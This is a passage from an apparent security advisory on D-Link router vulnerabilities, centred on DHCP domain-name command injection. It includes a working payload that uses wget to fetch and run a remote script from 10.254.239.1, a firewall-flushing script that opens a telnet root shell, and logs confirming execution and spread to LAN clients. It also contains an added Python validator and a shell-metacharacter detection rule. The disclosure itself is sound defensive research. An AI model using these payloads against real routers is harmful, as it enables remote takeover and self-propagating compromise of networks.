(for i in 0 1 2 3; do # win races against legit iptables rules
iptables -F        
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
sleep 10 
done ) &
/var/telnetd-dhcpd-wan -l /bin/sh -p 110 &

#

This telnetd is reachable from both the WAN and the LAN.

Vulnerability analysis

Several WAN RCE vulnerabilities are involved. The first one is in:

/etc/services/INET/inet_ipv4.php

$udhcpc_helper  = "/var/servd/".$inf."-udhcpc.sh";

Commands can be injected through any of these variables:

fwrite(w,$udhcpc_helper, 
            '#!/bin/sh\n'.
            'echo [$0]: $1 $interface $ip $subnet $router $lease $domain $scope $winstype $wins $sixrd_prefix $sixrd_prefixlen $sixrd_msklen $sixrd_bripaddr ... > /dev/console\n'.
            'phpsh '.$hlper.' ACTION=$1'.
                    ' INF='.$inf.
                    ' INET='.$inet.
                    ' MTU='.$mtu.
                    ' INTERFACE=$interface'.
                    ' IP=$ip'.
                    ' SUBNET=$subnet'.
                    ' BROADCAST=$broadcast'.
                    ' LEASE=$lease'.
                    ' "DOMAIN=$domain"'.
                    ' "ROUTER=$router"'.
                    ' "DNS='.$dns.'$dns"'.
                    ' "CLSSTROUT=$clsstrout"'.
                    ' "MSCLSSTROUT=$msclsstrout"'.
                    ' "SSTROUT=$sstrout"'.
                    ' "SCOPE=$scope"'.
                    ' "WINSTYPE=$winstype"'.
                    ' "WINS=$wins"'.
                    ' "SIXRDPFX=$sixrd_prefix"'.
                    ' "SIXRDPLEN=$sixrd_prefixlen"'.
                    ' "SIXRDMSKLEN=$sixrd_msklen"'.
                    ' "SIXRDBRIP=$sixrd_bripaddr"'.
                    ' "SDEST=$sdest"'.
                    ' "SSUBNET=$ssubnet"'.
                    ' "SROUTER=$srouter"\n'.
            'exit 0\n'
            );

As you can see, the variables are never sanitized. One way in is to inject a command through $domain (option domain-name in isc-dhcp), which ends up in the generated /var/servd/$VAR-udhcpc.sh shell script.

The file WAN-1-udhcpc.sh is generated and then invoked by udhcpc (udhcpc -i eth1 -H dlinkrouter -p /var/servd/WAN-1-udhcpc.pid -s /var/servd/WAN-1-udhcpc.sh).

# cat WAN-1-udhcpc.sh
#!/bin/sh
echo [$0]: $1 $interface $ip $subnet $router $lease $domain $scope $winstype $wins $sixrd_prefix $sixrd_prefixlen $sixrd_msklen $sixrd_bripaddr ... > /dev/console
phpsh /etc/services/INET/inet4_dhcpc_helper.php ACTION=$1 INF=WAN-1 INET=INET-3 MTU=1500 INTERFACE=$interface IP=$ip SUBNET=$subnet BROADCAST=$broadcast LEASE=$lease "DOMAIN=$domain" "ROUTER=$router" "DNS=$dns" "CLSSTROUT=$clsstrout" "MSCLSSTROUT=$msclsstrout" "SSTROUT=$sstrout" "SCOPE=$scope" "WINSTYPE=$winstype" "WINS=$wins" "SIXRDPFX=$sixrd_prefix" "SIXRDPLEN=$sixrd_prefixlen" "SIXRDMSKLEN=$sixrd_msklen" "SIXRDBRIP=$sixrd_bripaddr" "SDEST=$sdest" "SSUBNET=$ssubnet" "SROUTER=$srouter"
exit 0

Therefore, this DNS configuration works against the router too:

option domain-name "`wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;`";

In the logs, Pierre confirms the execution:

rasp-pwn-dlink# tail -f /var/log/nginx/access.log
10.254.239.10 - - [03/Jul/2017:15:42:31 +0000] "GET /dhcp-rce HTTP/1.1" 200 383 "-" "Wget"
10.254.239.10 - - [03/Jul/2017:15:42:31 +0000] "GET /dlink-telnetd HTTP/1.1" 200 10520 "-" "Wget"
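The generated scripts in this section paste the DHCP-supplied domain value straight into shell command lines. As an added example (not from the advisory and not D-Link's code), the Python below shows what a hardened generator would do instead: validate the option against the hostname grammar, refuse it otherwise, and single-quote it if it ever has to be written into a script; a shell-style tokenizer makes the difference visible. The sample values are constructed from the payload shapes shown above, and the `render_*` functions are hypothetical rewrites of the `xmldbc -s .../pool/domain` line, not the device's code.

```python
import re
import shlex

# Constructed sample option values: a legitimate name plus two values shaped
# like this section's payloads (the ";" form and the backtick form).
LEGIT_DOMAIN = "lan.example.com"
INJECT_SEMI = ";wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;"
INJECT_BACKTICK = "`wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;`"

# Assumed policy: an RFC 1035 hostname label is 1-63 letters, digits or
# hyphens with no leading or trailing hyphen; the whole name is <= 253 chars.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# Characters a POSIX shell would interpret; used as a coarse detection rule
# for DHCP option values seen on the wire or in generated scripts.
_SHELL_META = frozenset(";|&$`(){}<>\"'\\\n")


def is_valid_domain_name(value):
    """Allow-list check: True only for a syntactically valid domain name."""
    if not value or len(value) > 253:
        return False
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def contains_shell_metachars(value):
    """Deny-list check: True if the value could alter shell parsing."""
    return any(ch in _SHELL_META for ch in value)


def render_unsafe(domain):
    """Mirrors the vulnerable pattern: raw concatenation into a script line."""
    return "xmldbc -s /runtime/inf:1/dhcps4/pool/domain " + domain


def render_quoted(domain):
    """Quoting alone: the value becomes one shell word, whatever it contains."""
    return "xmldbc -s /runtime/inf:1/dhcps4/pool/domain " + shlex.quote(domain)


def render_hardened(domain):
    """Validate first, then quote; anything failing the grammar is refused."""
    if not is_valid_domain_name(domain):
        raise ValueError("rejected DHCP domain-name option: %r" % domain)
    return render_quoted(domain)


def shell_words(line):
    """Tokenize like a POSIX shell: quotes honoured, ; | & split out."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def command_count(line):
    """Number of simple commands the shell would see on this line."""
    separators = [w for w in shell_words(line) if w and set(w) <= set(";&|")]
    return 1 + len(separators)


if __name__ == "__main__":
    for value in (LEGIT_DOMAIN, INJECT_SEMI, INJECT_BACKTICK):
        print("valid=%-5s meta=%-5s %r" % (is_valid_domain_name(value),
                                           contains_shell_metachars(value), value))
    print("unsafe  :", command_count(render_unsafe(INJECT_SEMI)), "commands")
    print("quoted  :", command_count(render_quoted(INJECT_SEMI)), "command")
    print("hardened:", render_hardened(LEGIT_DOMAIN))
```

Note that tokenizing does not model command substitution, which is why the backtick form is caught by the grammar check and the metacharacter rule rather than by `command_count`.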

Note that the ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re; payload also ends up in some of the generated files (in /var/servd/):

# cat /var/servd/DHCPS4.LAN-1_start.sh
#!/bin/sh
rm -f /var/servd/LAN-1-udhcpd.lease
xmldbc -X /runtime/inf:1/dhcps4/leases
xmldbc -s /runtime/inf:1/dhcps4/pool/start 192.168.0.100
xmldbc -s /runtime/inf:1/dhcps4/pool/end 192.168.0.199
xmldbc -s /runtime/inf:1/dhcps4/pool/leasetime 604800
xmldbc -s /runtime/inf:1/dhcps4/pool/network 192.168.0.1
xmldbc -s /runtime/inf:1/dhcps4/pool/mask 24
xmldbc -s /runtime/inf:1/dhcps4/pool/domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re; <--- command injection
xmldbc -s /runtime/inf:1/dhcps4/pool/router 192.168.0.1
event UPDATELEASES.LAN-1 add "@/etc/events/UPDATELEASES.sh LAN-1 /var/servd/LAN-1-udhcpd.lease"
udhcpd /var/servd/LAN-1-udhcpd.conf &
exit 0
exit 0
#

# cat /var/servd/DHCPS4.LAN-2_start.sh
#!/bin/sh
rm -f /var/servd/LAN-2-udhcpd.lease
xmldbc -X /runtime/inf:2/dhcps4/leases
xmldbc -s /runtime/inf:2/dhcps4/pool/start 192.168.7.100
xmldbc -s /runtime/inf:2/dhcps4/pool/end 192.168.7.199
xmldbc -s /runtime/inf:2/dhcps4/pool/leasetime 604800
xmldbc -s /runtime/inf:2/dhcps4/pool/network 192.168.7.1
xmldbc -s /runtime/inf:2/dhcps4/pool/mask 24
xmldbc -s /runtime/inf:2/dhcps4/pool/domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re; <--- command injection
xmldbc -s /runtime/inf:2/dhcps4/pool/router 192.168.7.1
event UPDATELEASES.LAN-2 add "@/etc/events/UPDATELEASES.sh LAN-2 /var/servd/LAN-2-udhcpd.lease"
udhcpd /var/servd/LAN-2-udhcpd.conf &
exit 0
exit 0
#

This attack is passed on to internal clients by the DHCP server running inside the router, so if you connect another vulnerable D-Link router to the internal network, it will be pwned too:

# ps -w|grep dhcpd
 6543 root       984 S    udhcpd /var/servd/LAN-1-udhcpd.conf 
 6595 root       984 S    udhcpd /var/servd/LAN-2-udhcpd.conf

The /runtime/inf:{1,2}/dhcps4/pool/domain entries end up in the /var/servd/LAN-{1,2}-udhcpd.conf files, which then contain the rogue domain value:

# cat /var/servd/LAN-1-udhcpd.conf
remaining no
start 192.168.0.100
end 192.168.0.199
interface br0
lease_file /var/servd/LAN-1-udhcpd.lease
pidfile /var/servd/LAN-1-udhcpd.pid
force_bcast no
opt subnet 255.255.255.0
opt domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;

^^^^^^^^^^^^ this domain will be provided to clients connected on the LAN,
             possibly infecting other dlink routers \o/

opt router 192.168.0.1
opt dns 192.168.0.1
opt lease 604800
dhcp_helper event UPDATELEASES.LAN-1
# cat /var/servd/LAN-2-udhcpd.conf
remaining no
start 192.168.7.100
end 192.168.7.199
interface br1
lease_file /var/servd/LAN-2-udhcpd.lease
pidfile /var/servd/LAN-2-udhcpd.pid
force_bcast no
opt subnet 255.255.255.0
opt domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re

^^^^^^^^^^^^ this domain will be provided to clients connected on the LAN,
             possibly infecting other dlink routers \o/

opt router 192.168.7.1
opt dns 192.168.7.1
opt lease 604800
dhcp_helper event UPDATELEASES.LAN-2
#

X. DDoS vulnerability

Some daemons running in the router (revA and revB) can be crashed remotely from the LAN. Since this does not give an attacker any further remote privilege, no detailed analysis has been done yet.

Conclusion

D-Link has not yet responded to these 10 serious vulnerabilities, and it is currently unclear whether D-Link will acknowledge them or intends to fix them.
